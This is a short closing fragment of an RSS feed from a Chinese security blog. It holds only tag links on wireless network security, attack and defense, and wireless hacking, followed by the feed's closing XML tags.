href="http://www.rootkj.cn/go.php/tags/%25E6%2597%25A0%25E7%25BA%25BF%25E7%25BD%2591%25E7%25BB%259C%25E5%25AE%2589%25E5%2585%25A8/" rel="tag">无线网络安全</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E6%2597%25A0%25E7%25BA%25BF%25E7%25BD%2591%25E7%25BB%259C/" rel="tag">无线网络</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E6%2597%25A0%25E7%25BA%25BF%25E6%2594%25BB%25E9%2598%25B2/" rel="tag">无线攻防</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E7%25BD%2591%25E7%25BB%259C%25E6%2594%25BB%25E9%2598%25B2/" rel="tag">网络攻防</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E6%2597%25A0%25E7%25BA%25BF%25E9%25BB%2591%25E5%25AE%25A2/" rel="tag">无线黑客</a>
]]>
</description>
</item>
</channel>
</rss>
